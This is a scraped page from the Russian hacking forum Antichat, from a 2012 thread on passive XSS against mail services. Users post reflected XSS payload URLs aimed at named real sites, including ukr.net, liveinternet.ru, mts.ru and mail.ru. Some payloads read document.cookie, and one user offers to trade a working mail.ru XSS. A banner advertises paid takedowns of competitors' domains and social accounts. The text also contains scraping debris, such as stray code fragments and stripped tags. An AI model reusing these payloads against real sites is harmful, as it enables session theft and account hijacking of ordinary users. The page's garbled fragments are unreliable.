Пассивные xss на почтовых серверах

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Пассивные xss на почтовых серверах

Страница 21 из 25

« Первая

Опции темы

Поиск в этой теме

Опции просмотра

05.02.2012, 13:02

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

С нами: 10992741

Репутация: 0

Почта Укр.нет

[HTML]
http://kino.ukr.net/search?query="+onMouseover=alert(document.cookie)+ ">+

[/QUOTE]
" if author else f"

Цитата:

По сути можно поставить onerror и onload, нужно только подумать как .

𝕏 Twitter Reddit Telegram Копировать ссылку

05.02.2012, 13:56

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

С нами: 11322426

Репутация: 0

[QUOTE="Unix@"]
http://kino.ukr.net/search?query="+onMouseover=alert(document.cookie)+ ">++

05.02.2012, 16:09

kravch_v

Участник форума

Регистрация: 01.09.2011

Сообщений: 134

С нами: 7735286

Репутация: 1

[CODE]
http://kino.ukr.net/persons/search?query=">alert('xss')

Также есть активная XSS на самой странице видео.

Уязвимое место "теги"

05.02.2012, 21:31

kravch_v

Участник форума

Регистрация: 01.09.2011

Сообщений: 134

С нами: 7735286

Репутация: 1

LiveInternet.Ru

POST Запрос

Код:

http://liveinternet.ru/importmail.php?cmd=getbook_icq&addicqs=111">alert(/xss/)

Код:

http://liveinternet.ru/flashes.php?id=58259&page=0&filter=">alert('xss')

Код:

http://liveinternet.ru/flashes.php?id=629&page=1&userid=&cardinfo=">alert('xss')

Код:

http://litube.li.ru/yandex/?search_string=111">alert('xss')

09.02.2012, 19:59

kravch_v

Участник форума

Регистрация: 01.09.2011

Сообщений: 134

С нами: 7735286

Репутация: 1

Ya.ru

Уязвимый код:

Код:

1) Заходим на clubs.ya.ru

2) Жмякаем на "Записать мысль"

3) Пишем в "HTML-Режиме" уязвимый код и переходим в режим "с оформлением"

XSS Выполняется.

10.02.2012, 00:21

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

С нами: 11322426

Репутация: 0

Цитата:

Сообщение от kravch_v

3) Пишем в "HTML-Режиме" уязвимый код и переходим в режим "с оформлением"
XSS Выполняется.

Это не пассивка, а DOM-based

10.02.2012, 01:11

kravch_v

Участник форума

Регистрация: 01.09.2011

Сообщений: 134

С нами: 7735286

Репутация: 1

Цитата:

Сообщение от M_script

Это не пассивка, а DOM-based

Но тем не менее.

Еще видел одну маленькую дырочку, но раскрутить так и не смог. (Фильтруются , и еще несколько HTML-Тегов).

,
- выводятся.

10.02.2012, 14:41

Always

Познающий

Регистрация: 08.02.2012

Сообщений: 72

С нами: 7504886

Репутация: 0

Код:

http://pulse.mts.ru/search?q=">alert(document.cookie)

22.02.2012, 18:33

jacklndn

Новичок

Регистрация: 20.02.2012

Сообщений: 13

С нами: 7487606

Репутация: 0

На мaил есть рабочая хcс?

Мoгу пoменяться на oбхoд 704 oшибки

#10

26.02.2012, 10:56

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

С нами: 10992741

Репутация: 0

Xss на mail.ru

Работает не во всех платформах OC на Windows 7 не пашет.

Код:

http://search.enc.mail.ru/search_enc?q=">

Страница 21 из 25

« Первая

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ]	Cawabunga	Веб-уязвимости	43	12.01.2021 19:31
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23